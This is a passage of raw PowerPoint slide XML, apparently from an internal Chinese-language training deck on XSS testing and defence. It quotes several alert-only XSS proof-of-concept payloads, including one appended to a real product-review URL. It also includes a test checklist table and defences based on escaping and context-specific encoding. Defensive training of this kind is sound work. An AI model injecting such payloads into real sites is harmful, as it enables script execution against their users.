              <a:rPr sz="1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"&gt;&lt;img src=1 onerror=alert(/xss/)&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr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"&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6482080" y="4240530"/>
            <a:ext cx="471868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https://item.m.jd.com/replyList/4586850_ba053ce8-af4e-4c1b-9f00-5d749aa99227.html?sid=9fb2cacae436b2210b0203c9323536b9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#a="&gt;&lt;/iframe&gt;&lt;/head&gt;&lt;iframe/onload=alert(777)&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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漏洞说明：</a:t>
            </a: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PC使用oprea浏览器打开弹框，另外，测试华为mate系列使用手机浏览器打开弹框</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6477000" y="1637665"/>
            <a:ext cx="46678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"&gt;&lt;embed src="data:text/html;base64,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg"&gt;&lt;/embed&gt;</a:t>
            </a:r>
          </a:p>
          <a:p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漏洞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说明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sz="1200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直接复制</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="12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poc</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200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进去发布咨询编辑框会弹窗</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="12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+mn-ea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解决方案：清除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脏数据，输入框前端限制白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名单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504190" y="503555"/>
            <a:ext cx="7717155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CC3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>跨站脚本攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>——Dom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>案例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3260" y="2114550"/>
            <a:ext cx="5171440" cy="12287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3260" y="4436110"/>
            <a:ext cx="5228590" cy="17907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628015" y="1537970"/>
            <a:ext cx="9102725" cy="3928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</a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pP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防御方法</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr 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1) 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转义特殊字符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</a:t>
            </a:r>
            <a:r>
              <a:rPr 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&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr 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</a:t>
            </a:r>
            <a:r>
              <a:rPr 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'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，尽可能地覆盖到各种攻击代码，阻止JS代码被执行</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pP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</a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pP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2)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正确编码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如果编码正确，浏览器会正确地解析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，编码就是让解析者知道数据不是用来执行的代码，从而可以避免遭受攻击。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="l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在HTML标签中输出：对变量HtmlEncode </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc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在HTML属性中输出：对变量HtmlEncode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc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在&lt;script&gt;标签中输出：对变量JavascriptEncode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc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在事件中输出：对变量JavascriptEncode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc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……</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pP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0" name="文本占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="504453" y="503783"/>
            <a:ext cx="612068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CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>跨站脚本攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>——</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>防御方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC33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565" y="3263265"/>
            <a:ext cx="2272665" cy="2106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>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6882" y="2367064"/>
            <a:ext cx="11520311" cy="1323036"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 9144000"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1076325"/>
              <a:gd name="connsiteX1" fmla="*/ 7058024 w 9144000"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1076325"/>
              <a:gd name="connsiteX2" fmla="*/ 7058024 w 9144000"/>
              <a:gd name="connsiteY2" fmla="*/ 973931 h 1076325"/>
              <a:gd name="connsiteX3" fmla="*/ 8354024 w 9144000"/>
              <a:gd name="connsiteY3" fmla="*/ 973931 h 1076325"/>
              <a:gd name="connsiteX4" fmla="*/ 8354024 w 9144000"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 1076325"/>
              <a:gd name="connsiteX5" fmla="*/ 9144000 w 9144000"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 1076325"/>
              <a:gd name="connsiteX6" fmla="*/ 9144000 w 9144000"/>
              <a:gd name="connsiteY6" fmla="*/ 1076325 h 1076325"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 9144000"/>
              <a:gd name="connsiteY7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076325">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7058024" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7058024" y="973931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8354024" y="973931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8354024" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="1076325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1076325"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FA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025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882" y="2577070"/>
            <a:ext cx="8886240" cy="898525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53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cs"/>
              </a:rPr>
              <a:t>漏洞类型</a:t>
            </a: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8989125" y="2056556"/>
            <a:ext cx="1452039" cy="1419038"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1152000"/>
              <a:gd name="connsiteX1" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1152000"/>
              <a:gd name="connsiteX2" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY2" fmla="*/ 1152000 h 1152000"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY3" fmla="*/ 1152000 h 1152000"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 1152000"/>
              <a:gd name="connsiteX0-1" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY0-2" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX1-3" fmla="*/ 323289 w 1152000"/>
              <a:gd name="connsiteY1-4" fmla="*/ 0 h 1154343"/>
              <a:gd name="connsiteX2-5" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY2-6" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX3-7" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY3-8" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX4-9" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY4-10" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY5" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX0-11" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY0-12" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX1-13" fmla="*/ 323289 w 1152000"/>
              <a:gd name="connsiteY1-14" fmla="*/ 0 h 1154343"/>
              <a:gd name="connsiteX2-15" fmla="*/ 825732 w 1152000"/>
              <a:gd name="connsiteY2-16" fmla="*/ 1 h 1154343"/>
              <a:gd name="connsiteX3-17" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY3-18" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX4-19" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY4-20" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX5-21" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY5-22" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY6" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX0-23" fmla="*/ 825732 w 1152000"/>
              <a:gd name="connsiteY0-24" fmla="*/ 1 h 1154343"/>
              <a:gd name="connsiteX1-25" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY1-26" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX2-27" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY2-28" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX3-29" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY3-30" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX4-31" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY4-32" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX5-33" fmla="*/ 323289 w 1152000"/>
              <a:gd name="connsiteY5-34" fmla="*/ 0 h 1154343"/>
              <a:gd name="connsiteX6-35" fmla="*/ 917172 w 1152000"/>
              <a:gd name="connsiteY6-36" fmla="*/ 91441 h 1154343"/>
              <a:gd name="connsiteX0-37" fmla="*/ 825732 w 1152000"/>
              <a:gd name="connsiteY0-38" fmla="*/ 1 h 1154343"/>
              <a:gd name="connsiteX1-39" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY1-40" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX2-41" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY2-42" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX3-43" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY3-44" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX4-45" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY4-46" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX5-47" fmla="*/ 323289 w 1152000"/>
              <a:gd name="connsiteY5-48" fmla="*/ 0 h 1154343"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="connsiteX0-37" y="connsiteY0-38"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX1-39" y="connsiteY1-40"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX2-41" y="connsiteY2-42"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX3-43" y="connsiteY3-44"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX4-45" y="connsiteY4-46"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="connsiteX5-47" y="connsiteY5-48"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1152000" h="1154343">
                <a:moveTo>
                  <a:pt x="825732" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1152000" y="2343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1152000" y="1154343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1154343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="323289" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="19050"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10250"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670" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="E2231A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cs"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="567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+mn-cs"/>
            </a:endParaRPr>
          </a:p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535" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="E2231A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cs"/>
              </a:rPr>
              <a:t>part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532" y="-5785"/>
            <a:ext cx="11518986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90"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="文本框 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1306911" y="1443999"/>
            <a:ext cx="1475998" cy="7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425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47"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2321678" y="1584460"/>
            <a:ext cx="4091714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86393" tIns="43197" rIns="86393" bIns="4319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13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做最好的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="13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3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，给最好的你。更多作品请在稻壳儿搜索：没有肉的鸡腿。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1325" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="文本占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="504453" y="503783"/>
            <a:ext cx="612068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CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>跨站脚本攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC33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C3300"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>测试方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill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549275" y="1586865"/>
          <a:ext cx="1068514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300"/>
                <a:gridCol w="987425"/>
                <a:gridCol w="2656205"/>
                <a:gridCol w="2302510"/>
                <a:gridCol w="2430145"/>
                <a:gridCol w="804545"/>
                <a:gridCol w="628015"/>
              </a:tblGrid>
              <a:tr h="3962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漏洞类型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正确结果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POC样例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是否达标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备注</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="381000">
                <a:tc rowSpan="4"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XSS漏洞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json参数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>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                        </a:rPr>
                        <a:t>对每个json参数构造POC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>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                        </a:rPr>
                        <a:t>返回结果过滤/转义非法字符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>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                        </a:rPr>
                        <a:t>&lt;script&gt;alert(1)&lt;/script&gt;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3810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普通参数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>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                        </a:rPr>
                        <a:t>对参数构造POC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>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                        </a:rPr>
                        <a:t>返回结果过滤/转义非法字符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微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                        </a:rPr>
                        <a:t>'</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                        </a:rPr>
                        <a:t>-alert(1)-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1000">
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                        </a:rPr>
                        <a:t>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3810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输入框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>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                        </a:rPr>
                        <a:t>对输入框构造POC</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1000">
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                        </a:rPr>
                        <a:t>（手动输入POC and 直接复制粘贴POC）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>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                        </a:rPr>
                        <a:t>读取输入值的 CGI 过滤/转义非法字符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>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                        </a:rPr>
                        <a:t>&lt;script&gt;alert(1)&lt;/script&gt;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　</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="3810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>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                        </a:rPr>
                        <a:t>写CGI，对写入DB或进行存储的参数构造POC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>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                        </a:rPr>
                        <a:t>读 CGI 过滤/转义非法字符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>
                          <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                          <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                        </a:rPr>
                        <a:t>%3cscript%3ealert(1)%3c%2fscript%3e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549275" y="4973320"/>
            <a:ext cx="52114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POC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Proof of Concept的缩写，意思是为观点提供证据。</a:t>
            </a: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只是证据，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证明该漏洞存在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，但并不是利用方法，无法直接利用。</a:t>
            </a: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Exploit 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英文意思就是利用，它在黑客眼里就是漏洞利用。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49275" y="4306570"/>
            <a:ext cx="5001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2018年安全案例分析&amp;安全测试checklist</a:t>
            </a:r>
          </a:p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https://cf.jd.com/pages/viewpage.action?pageId=109441501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>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6882" y="2367064"/>
            <a:ext cx="11520311" cy="1323036"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 9144000"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1076325"/>
              <a:gd name="connsiteX1" fmla="*/ 7058024 w 9144000"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1076325"/>
              <a:gd name="connsiteX2" fmla="*/ 7058024 w 9144000"/>
              <a:gd name="connsiteY2" fmla="*/ 973931 h 1076325"/>
              <a:gd name="connsiteX3" fmla="*/ 8354024 w 9144000"/>
              <a:gd name="connsiteY3" fmla="*/ 973931 h 1076325"/>
              <a:gd name="connsiteX4" fmla="*/ 8354024 w 9144000"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 1076325"/>
              <a:gd name="connsiteX5" fmla="*/ 9144000 w 9144000"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 1076325"/>
              <a:gd name="connsiteX6" fmla="*/ 9144000 w 9144000"/>
              <a:gd name="connsiteY6" fmla="*/ 1076325 h 1076325"/>
              <a:gd name="connsiteX7" fmla="*/ 0 w 9144000"/>
              <a:gd name="connsiteY7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076325">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7058024" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7058024" y="973931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8354024" y="973931"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8354024" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="1076325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1076325"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FA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025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882" y="2577070"/>
            <a:ext cx="8886240" cy="898525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53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cs"/>
              </a:rPr>
              <a:t>扫描和修复要求</a:t>
            </a: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8989125" y="2056556"/>
            <a:ext cx="1452039" cy="1419038"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1152000"/>
              <a:gd name="connsiteX1" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 1152000"/>
              <a:gd name="connsiteX2" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY2" fmla="*/ 1152000 h 1152000"/>
              <a:gd name="connsiteX3" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY3" fmla="*/ 1152000 h 1152000"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 1152000"/>
              <a:gd name="connsiteX0-1" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY0-2" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX1-3" fmla="*/ 323289 w 1152000"/>
              <a:gd name="connsiteY1-4" fmla="*/ 0 h 1154343"/>
              <a:gd name="connsiteX2-5" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY2-6" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX3-7" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY3-8" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX4-9" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY4-10" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY5" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX0-11" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY0-12" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX1-13" fmla="*/ 323289 w 1152000"/>
              <a:gd name="connsiteY1-14" fmla="*/ 0 h 1154343"/>
              <a:gd name="connsiteX2-15" fmla="*/ 825732 w 1152000"/>
              <a:gd name="connsiteY2-16" fmla="*/ 1 h 1154343"/>
              <a:gd name="connsiteX3-17" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY3-18" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX4-19" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY4-20" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX5-21" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY5-22" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY6" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX0-23" fmla="*/ 825732 w 1152000"/>
              <a:gd name="connsiteY0-24" fmla="*/ 1 h 1154343"/>
              <a:gd name="connsiteX1-25" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY1-26" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX2-27" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY2-28" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX3-29" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY3-30" fmla="*/ 1154343 h 1154343"/>
              <a:gd name="connsiteX4-31" fmla="*/ 0 w 1152000"/>
              <a:gd name="connsiteY4-32" fmla="*/ 2343 h 1154343"/>
              <a:gd name="connsiteX5-33" fmla="*/ 323289 w 1152000"/>
              <a:gd name="connsiteY5-34" fmla="*/ 0 h 1154343"/>
              <a:gd name="connsiteX6-35" fmla="*/ 917172 w 1152000"/>
              <a:gd name="connsiteY6-36" fmla="*/ 91441 h 1154343"/>
              <a:gd name="connsiteX0-37" fmla="*/ 825732 w 1152000"/>
              <a:gd name="connsiteY0-38" fmla="*/ 1 h 1154343"/>
              <a:gd name="connsiteX1-39" fmla="*/ 1152000 w 1152000"/>
              <a:gd name="connsiteY1-40" fmla="*/ 2343 h 1154343"/>
